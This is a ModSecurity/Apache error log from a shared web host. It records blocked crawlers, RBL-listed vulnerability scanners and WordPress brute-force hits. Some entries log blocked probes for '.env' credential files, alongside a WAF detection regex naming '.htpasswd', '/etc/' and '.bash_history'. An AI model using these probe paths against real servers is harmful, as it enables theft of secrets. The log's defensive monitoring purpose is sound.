[Tue May 26 15:22:49.873973 2026] [security2:error] [pid 707292:tid 707448] [client 8.215.24.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/emergency.php"] [unique_id "ahVtcdKAqlRPSIEFAutqhgAAAJ8"]
[Tue May 26 15:22:49.874524 2026] [security2:error] [pid 707292:tid 707449] [client 8.215.24.140:59696] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/emergency.php"] [unique_id "ahVtcdKAqlRPSIEFAutqhAAAAKA"]
[Tue May 26 15:22:50.406162 2026] [security2:error] [pid 707292:tid 707531] [client 8.215.24.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/blog/emergency.php"] [unique_id "ahVtctKAqlRPSIEFAutqmAAAAPI"]
[Tue May 26 15:22:50.406753 2026] [security2:error] [pid 707292:tid 707471] [client 8.215.24.140:59696] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/blog/emergency.php"] [unique_id "ahVtctKAqlRPSIEFAutqlQAAALY"]
[Tue May 26 15:22:51.266133 2026] [security2:error] [pid 707292:tid 707494] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtctKAqlRPSIEFAutqpQAAAM0"]
[Tue May 26 15:22:53.616019 2026] [security2:error] [pid 707292:tid 707450] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtddKAqlRPSIEFAutq3gAAAKE"]
[Tue May 26 15:22:53.874111 2026] [core:crit] [pid 707292:tid 707437] (13)Permission denied: [client 52.167.144.225:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:22:53.969731 2026] [core:crit] [pid 707292:tid 707449] (13)Permission denied: [client 52.167.144.225:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:22:55.484114 2026] [security2:error] [pid 707292:tid 707548] [client 85.208.96.204:64878] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahVtd9KAqlRPSIEFAutrKAAAAQM"]
[Tue May 26 15:22:55.484230 2026] [security2:error] [pid 707292:tid 707548] [client 85.208.96.204:64878] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahVtd9KAqlRPSIEFAutrKAAAAQM"]
[Tue May 26 15:22:55.548534 2026] [security2:error] [pid 707292:tid 707425] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtd9KAqlRPSIEFAutrHQAAAIg"]
[Tue May 26 15:22:56.584053 2026] [security2:error] [pid 707292:tid 707462] [client 89.124.113.81:15706] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 81.113.124.89.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-comments-post.php"] [unique_id "ahVteNKAqlRPSIEFAutrOwAAAK0"], referer: https://avprealty.com/testimonial/rohit/
[Tue May 26 15:22:56.584243 2026] [security2:error] [pid 707292:tid 707462] [client 89.124.113.81:15706] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "avprealty.com"] [uri "/wp-comments-post.php"] [unique_id "ahVteNKAqlRPSIEFAutrOwAAAK0"], referer: https://avprealty.com/testimonial/rohit/
[Tue May 26 15:22:57.834970 2026] [security2:error] [pid 707292:tid 707545] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtedKAqlRPSIEFAutrXwAAAQA"]
[Tue May 26 15:22:59.543267 2026] [security2:error] [pid 707292:tid 707531] [client 102.129.252.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVte9KAqlRPSIEFAutrjQAAAPI"]
[Tue May 26 15:22:59.853164 2026] [security2:error] [pid 707292:tid 707512] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVte9KAqlRPSIEFAutroQAAAN8"]
[Tue May 26 15:23:01.677766 2026] [security2:error] [pid 707292:tid 707510] [client 185.255.126.50:39665] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVtfdKAqlRPSIEFAutr1wAAAN0"], referer: https://www.glorodrc.com/index.php?route=information/contact
[Tue May 26 15:23:01.806781 2026] [security2:error] [pid 707292:tid 707450] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtfdKAqlRPSIEFAutr1gAAAKE"]
[Tue May 26 15:23:03.764232 2026] [security2:error] [pid 707292:tid 707425] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtf9KAqlRPSIEFAutsGAAAAIg"]
[Tue May 26 15:23:04.448541 2026] [security2:error] [pid 707292:tid 707499] [client 31.59.129.102:57708] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.pronumbers.com.au"] [uri "/.env"] [unique_id "ahVtgNKAqlRPSIEFAutsMwAAANI"]
[Tue May 26 15:23:05.561515 2026] [security2:error] [pid 707292:tid 707528] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtgdKAqlRPSIEFAutsQwAAAO8"]
[Tue May 26 15:23:06.316287 2026] [security2:error] [pid 707292:tid 707510] [client 74.7.175.153:60276] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.lagoslawntennisclub1895.com"] [uri "/robots.txt"] [unique_id "ahVtgtKAqlRPSIEFAutsXwAA3Q4"]
[Tue May 26 15:23:08.271643 2026] [security2:error] [pid 707292:tid 707501] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtg9KAqlRPSIEFAutsggAAANQ"]
[Tue May 26 15:23:08.759188 2026] [security2:error] [pid 707292:tid 707549] [client 31.59.129.102:53766] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.pronumbers.com.au"] [uri "/backend/.env"] [unique_id "ahVthNKAqlRPSIEFAutsoAAAAQQ"]
[Tue May 26 15:23:08.759852 2026] [security2:error] [pid 707292:tid 707509] [client 31.59.129.102:53780] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.pronumbers.com.au"] [uri "/api/.env"] [unique_id "ahVthNKAqlRPSIEFAutsmwAAANw"]
[Tue May 26 15:23:10.354690 2026] [security2:error] [pid 707292:tid 707498] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVthdKAqlRPSIEFAutszQAAANE"]
[Tue May 26 15:23:11.780268 2026] [security2:error] [pid 707292:tid 707548] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVth9KAqlRPSIEFAuts9wAAAQM"]
[Tue May 26 15:23:14.669966 2026] [security2:error] [pid 707292:tid 707437] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtitKAqlRPSIEFAuttRAAAAJQ"]
[Tue May 26 15:23:16.884540 2026] [security2:error] [pid 707292:tid 707542] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtjNKAqlRPSIEFAuttdgAAAP0"]
[Tue May 26 15:23:18.245591 2026] [security2:error] [pid 707292:tid 707443] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtjdKAqlRPSIEFAuttpwAAAJo"]
[Tue May 26 15:23:21.056782 2026] [security2:error] [pid 707292:tid 707530] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtkNKAqlRPSIEFAutt7wAAAPE"]
[Tue May 26 15:23:21.155918 2026] [security2:error] [pid 707292:tid 707465] [client 109.248.205.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVtkdKAqlRPSIEFAutuAwAAALA"], referer: https://www.anujtradingco.com/
[Tue May 26 15:23:21.209056 2026] [security2:error] [pid 707292:tid 707446] [client 114.119.138.37:45931] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "greattusker.com"] [uri "/author/tgsk/"] [unique_id "ahVtkdKAqlRPSIEFAutuBgAAAJ0"], referer: https://greattusker.com/author/tgsk/
[Tue May 26 15:23:22.947138 2026] [security2:error] [pid 707292:tid 707452] [client 109.248.205.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVtktKAqlRPSIEFAutuQgAAAKM"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1225207&moderation-hash=786b3a7a8e7d5451d1268d58b9f0b4fc
[Tue May 26 15:23:23.120350 2026] [security2:error] [pid 707292:tid 707462] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtktKAqlRPSIEFAutuOwAAAK0"]
[Tue May 26 15:23:23.289271 2026] [security2:error] [pid 707292:tid 707488] [client 74.7.230.31:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVtk9KAqlRPSIEFAutuWQAAAMc"]
[Tue May 26 15:23:23.289295 2026] [security2:error] [pid 707292:tid 707488] [client 74.7.230.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVtk9KAqlRPSIEFAutuWQAAAMc"]
[Tue May 26 15:23:23.289972 2026] [security2:error] [pid 707292:tid 707461] [client 74.7.230.31:50028] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/robots.txt"] [unique_id "ahVtk9KAqlRPSIEFAutuVwAArEc"]
[Tue May 26 15:23:25.033503 2026] [security2:error] [pid 707292:tid 707444] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtlNKAqlRPSIEFAutuiwAAAJs"]
[Tue May 26 15:23:25.581556 2026] [security2:error] [pid 707292:tid 707497] [client 38.246.32.101:56157] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahVtldKAqlRPSIEFAutupAAAANA"]
[Tue May 26 15:23:26.959433 2026] [security2:error] [pid 707292:tid 707389] [remote 157.55.39.10:3774] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.39.55.157.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gciamd.org.in"] [uri "/amd-regalia.php"] [unique_id "ahVtltKAqlRPSIEFAutu5wAAjmA"]
[Tue May 26 15:23:27.129008 2026] [security2:error] [pid 707292:tid 707498] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtltKAqlRPSIEFAutu2gAAANE"]
[Tue May 26 15:23:28.874924 2026] [security2:error] [pid 707292:tid 707486] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtmNKAqlRPSIEFAutvDwAAAMU"]
[Tue May 26 15:23:28.952640 2026] [security2:error] [pid 707292:tid 707413] [remote 47.251.53.97:59542] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.53.251.47.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahVtmNKAqlRPSIEFAutvEwAA-Xg"]
[Tue May 26 15:23:29.388561 2026] [security2:error] [pid 707292:tid 707537] [client 46.163.139.162:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtmNKAqlRPSIEFAutvHwAAAPg"]
[Tue May 26 15:23:30.253813 2026] [security2:error] [pid 707292:tid 707540] [client 109.248.205.69:53979] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVtmdKAqlRPSIEFAutvMAAAAPs"], referer: https://anujtradingco.com
[Tue May 26 15:23:30.923229 2026] [security2:error] [pid 707292:tid 707461] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtmtKAqlRPSIEFAutvSAAAAKw"]
[Tue May 26 15:23:33.091024 2026] [security2:error] [pid 707292:tid 707427] [client 216.244.66.241:58576] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/global/content/flattire/index.html"] [unique_id "ahVtndKAqlRPSIEFAutvpQAAAIo"]
[Tue May 26 15:23:33.091114 2026] [security2:error] [pid 707292:tid 707427] [client 216.244.66.241:58576] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/global/content/flattire/index.html"] [unique_id "ahVtndKAqlRPSIEFAutvpQAAAIo"]
[Tue May 26 15:23:33.566586 2026] [security2:error] [pid 707292:tid 707494] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtndKAqlRPSIEFAutvqwAAAM0"]
[Tue May 26 15:23:35.627877 2026] [security2:error] [pid 707292:tid 707432] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtn9KAqlRPSIEFAutv7wAAAI8"]
[Tue May 26 15:23:37.731407 2026] [security2:error] [pid 707292:tid 707511] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtodKAqlRPSIEFAutwMQAAAN4"]
[Tue May 26 15:23:39.347586 2026] [security2:error] [pid 707292:tid 707467] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtotKAqlRPSIEFAutwXwAAALI"]
[Tue May 26 15:23:41.207850 2026] [security2:error] [pid 707292:tid 707436] [client 114.119.152.167:37627] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahVtpdKAqlRPSIEFAutwmwAAAJM"], referer: http://haddingtonwines.com/cart?remove_item=e8432fb72c61c9066957124e5a420a05
[Tue May 26 15:23:41.720226 2026] [security2:error] [pid 707292:tid 707476] [client 114.119.131.93:23541] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/prespontaneousffad/dbcfda1138836.shtml"] [unique_id "ahVtpdKAqlRPSIEFAutwrAAAALs"], referer: http://ghanemgh.com/prespontaneousffad/dbcfda1138836.shtml
[Tue May 26 15:23:42.045019 2026] [security2:error] [pid 707292:tid 707532] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtpdKAqlRPSIEFAutwpAAAAPM"]
[Tue May 26 15:23:43.622992 2026] [security2:error] [pid 707292:tid 707471] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtp9KAqlRPSIEFAutwxwAAALY"]
[Tue May 26 15:23:44.024202 2026] [security2:error] [pid 707292:tid 707463] [client 185.191.171.16:33478] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-3-7/list/"] [unique_id "ahVtqNKAqlRPSIEFAutw4QAAAK4"]
[Tue May 26 15:23:44.024371 2026] [security2:error] [pid 707292:tid 707463] [client 185.191.171.16:33478] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-3-7/list/"] [unique_id "ahVtqNKAqlRPSIEFAutw4QAAAK4"]
[Tue May 26 15:23:47.803676 2026] [security2:error] [pid 707292:tid 707456] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtq9KAqlRPSIEFAutxNQAAAKc"]
[Tue May 26 15:23:47.890512 2026] [security2:error] [pid 707292:tid 707518] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtq9KAqlRPSIEFAutxOAAAAOU"]
[Tue May 26 15:23:50.424023 2026] [security2:error] [pid 707292:tid 707515] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtrtKAqlRPSIEFAutxfQAAAOI"]
